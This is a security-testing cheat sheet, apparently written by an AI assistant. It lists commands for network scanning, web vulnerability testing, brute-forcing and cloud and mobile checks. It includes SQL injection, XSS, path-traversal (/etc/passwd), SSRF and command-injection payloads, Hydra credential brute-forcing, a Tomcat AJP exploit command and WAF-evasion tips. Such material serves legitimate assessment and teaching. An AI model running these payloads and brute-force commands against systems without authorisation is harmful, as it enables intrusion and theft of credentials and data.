Vulnerability scanning in depth involves identifying and assessing security weaknesses in systems, applications, or networks through automated or manual techniques. Advanced vulnerability scanning workflows combine comprehensive tools, custom configurations, and contextual analysis to ensure accuracy and actionable findings.
- Discovery: Identify all assets (subdomains, IPs, endpoints).
- Enumeration: Uncover services, open ports, and application details.
- Assessment: Analyze potential vulnerabilities and misconfigurations.
- Verification: Manually validate findings to reduce false positives.
- Accuracy: Avoid false positives or negatives.
- Coverage: Ensure no critical asset is missed.
- Performance: Handle rate limits, large targets, or complex environments.
-
Nmap
-
Advanced scanning example:
nmap -sC -sV -p 1-65535 --min-rate=1000 -T4 -Pn -oN full_scan.txt 192.168.1.0/24
-sC: Default scripts for vulnerability detection.-sV: Service version detection.--min-rate=1000: Increase packet sending rate.
-
Script-based scanning:
nmap --script=vuln -oN vuln_scan.txt 192.168.1.1
-
-
Nikto
- Web server vulnerability scanner:
nikto -h http://example.com -p 80,443 -output nikto_results.txt
- Web server vulnerability scanner:
-
OpenVAS (Greenbone)
- Comprehensive network vulnerability management:
- Install and configure:
sudo apt install openvas sudo gvm-setup
- Run a scan:
gvm-cli --xml "<scan command XML>" --hostname <IP>
- Install and configure:
- Comprehensive network vulnerability management:
-
Nuclei
-
Vulnerability scanning with templates:
nuclei -l targets.txt -t nuclei-templates/ -o results.txt
-
Use specific templates:
nuclei -u https://example.com -t cves/ -t misconfiguration/ -t exposure/
-
-
Burp Suite
- Set up a targeted scan:
- Configure scope: Add specific URLs or patterns.
- Use Active Scanning for authenticated testing.
- Set up a targeted scan:
-
Custom Nuclei Template: For identifying sensitive files:
id: sensitive-file-disclosure info: name: Sensitive File Disclosure severity: critical description: Detects sensitive files like env, config, or backup files. requests: - method: GET path: - "{{BaseURL}}/.env" - "{{BaseURL}}/config.json" - "{{BaseURL}}/backup.zip" matchers: - type: word words: - "DB_PASSWORD" - "API_KEY"
-
Rate Control in Nmap: To prevent blacklisting or throttling:
nmap -p 1-1000 --max-retries 2 --max-rate 500 -oN throttled_scan.txt 192.168.1.1
-
Subdomain Discovery:
subfinder -d example.com -o subdomains.txt amass enum -d example.com -o amass_subdomains.txt
Combine and clean:
sort -u subdomains.txt amass_subdomains.txt > all_subdomains.txt -
IP Range Mapping:
- Using ASN data:
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+"
- Full IP enumeration:
nmap -sL -n <CIDR> | awk '/Nmap scan report/{print $NF}' > ips.txt
- Using ASN data:
-
Masscan for Fast Scanning:
masscan -p80,443,22 --rate=1000 -iL ips.txt -oG masscan_results.txt
-
Nmap for Service Details:
nmap -sC -sV -iL open_ips.txt -oN service_details.txt
-
Web Server Vulnerabilities:
- Nikto for default scans:
nikto -h https://example.com -output nikto_results.txt
- Nikto for default scans:
-
Custom Nuclei Templates:
- For CVEs:
nuclei -l live_urls.txt -t cves/
- For CVEs:
-
SQL Injection Testing: Using SQLMap:
sqlmap -u "https://example.com/login" --data="username=admin&password=1" --dbs
-
XSS Payloads: Manually test with variations:
<script>alert(document.cookie)</script>
-
Exposed Admin Port: Use Hydra for brute-forcing credentials:
hydra -L usernames.txt -P passwords.txt ssh://192.168.1.1
- Use Burp Suite or Postman to validate vulnerabilities.
- Check headers for misconfigurations:
curl -I https://example.com
- Target: A misconfigured Tomcat server.
- Tools:
- Use
nmapfor detection:nmap -p 8009 --script ajp-auth 192.168.1.1
- Exploit:
java -cp tomcat_exploit.jar Exploit 192.168.1.1 8009
- Use
- Example: Accessing sensitive files via
/etc/passwd. - FFUF Example:
ffuf -u https://example.com/FUZZ -w wordlist.txt -o traversal_results.json
-
Use Custom Wordlists: Tailor them for specific targets using tools like cewl.
cewl https://example.com -w custom_wordlist.txt
-
Avoid WAF Detection:
- Randomize user-agents:
curl -A "Mozilla/5.0" https://example.com
- Randomize user-agents:
-
Leverage APIs: Use vulnerability databases like Shodan or Censys to cross-check findings.
Here are more advanced examples of vulnerability scanning across different domains, illustrating workflows, tools, and techniques. These examples focus on real-world scenarios in various categories of vulnerabilities.
- Scenario: Testing a login form for SQL injection.
- Tool: SQLMap.
- Command:
sqlmap -u "https://example.com/login" --data="username=admin&password=12345" --dbs
- Explanation:
- This command tests for SQL injection by injecting payloads into the
usernameandpasswordfields. - The
--dbsflag retrieves database names if the injection is successful.
- This command tests for SQL injection by injecting payloads into the
- Scenario: Detecting stored XSS in a blog comment section.
- Payload:
<script>alert('XSS');</script>
- Manual Testing Steps:
- Submit the payload in the comment section of a blog post.
- Refresh the page to see if the alert is triggered.
- Automated Tool: XSStrike.
xsstrike -u https://example.com/comment -data "comment=<script>alert(1)</script>"
- Scenario: Exploiting a file download feature to access sensitive files.
- Target URL:
https://example.com/download?file=../../../etc/passwd - Tools: FFUF (Fuzzing).
ffuf -u https://example.com/download?file=FUZZ -w wordlist.txt - Payload Examples in
wordlist.txt:../../../etc/passwd ../../../../windows/win.ini ../../../var/log/auth.log
- Scenario: Exploiting an image upload feature to make internal requests.
- Payload:
<img src="http://127.0.0.1:8080/admin">
- Automation: Use Burp Suite Intruder to test for SSRF payloads.
- Advanced Test: Use a public server like requestbin to observe callbacks.
- Tool: Masscan.
- Command:
masscan -p22,80,443 --rate=1000 192.168.1.0/24 -oL masscan_results.txt
- Explanation:
- Scans for SSH (22), HTTP (80), and HTTPS (443) ports across a subnet.
- Outputs results in a text file.
- Tool: Nmap.
- Command:
nmap -sV -sC -p 22,80,443 -oN service_scan.txt 192.168.1.100
- Explanation:
-sV: Detects service versions.-sC: Runs default scripts for vulnerabilities.
- Scenario: Identifying unpatched vulnerabilities in exposed services.
- Tool: Nmap with CVE scripts.
nmap --script vuln -oN vuln_scan.txt 192.168.1.100
- Scenario: Testing an API endpoint for unauthorized data access.
- Target:
GET /api/v1/users/12345 - Testing Steps:
- Replace the ID
12345with12346and observe if data for another user is exposed. - Automate with Burp Suite Intruder.
- Replace the ID
- Scenario: Testing if an API allows excessive requests.
- Tool: FFUF.
ffuf -u https://api.example.com/v1/login -w usernames.txt:U -w passwords.txt:P -X POST -d "username=U&password=P" - Result: Identifies if the API accepts unlimited login attempts.
- Scenario: Testing an API for command injection.
- Request:
POST /api/v1/execute { "command": "ls" }
- Testing Tool: Postman or Curl.
curl -X POST https://example.com/api/execute -d '{"command":"ls"}'
- Scenario: Finding public S3 buckets.
- Tool: AWS CLI.
aws s3 ls s3://example-bucket --no-sign-request
- Advanced Tool: ScoutSuite.
scoutsuite aws --account-name example-account
- Scenario: Detecting overly permissive policies.
- Tool: Prowler.
prowler -M csv -o prowler_results.csv
- Scenario: Testing if sensitive data is stored in plaintext.
- Tools:
- ADB: Extract app data.
adb pull /data/data/com.example.app/shared_prefs/
- Objection: Analyze data storage.
objection --gadget "ExampleApp" explore
- ADB: Extract app data.
- Scenario: Finding hardcoded secrets in the APK.
- Tool: JADX.
jadx -d decompiled/ app.apk
- Look for Sensitive Files:
- API keys or credentials in
strings.xml. - Hardcoded secrets in Java classes.
- API keys or credentials in
- Scenario: Testing IoT devices for default or weak credentials.
- Tool: Hydra.
hydra -L usernames.txt -P passwords.txt ssh://192.168.1.50
- Scenario: Scanning IoT devices for unusual open ports.
- Tool: Nmap.
nmap -p- 192.168.1.50 -oN iot_scan.txt
- Scenario: Testing a website for missing headers.
- Tool: Curl.
curl -I https://example.com
- Look for Missing Headers:
Content-Security-Policy.X-Frame-Options.Strict-Transport-Security.
-
Tool: SSL Labs.
- Online scanner: SSL Labs.
-
Command-Line Tool: TestSSL.sh.
./testssl.sh https://example.com
- Use Subfinder + FFUF + Nuclei:
subfinder -d example.com | httpx | nuclei -t cves/ -o web_vulns.txt ffuf -u https://example.com/FUZZ -w endpoints.txt -o ffuf_results.txt
- Use Nmap + Nikto:
nmap -sV -iL targets.txt -oN service_scan.txt nikto -h https://example.com -output nikto_results.txt
Would you like further elaboration on any specific category, workflow, or tool?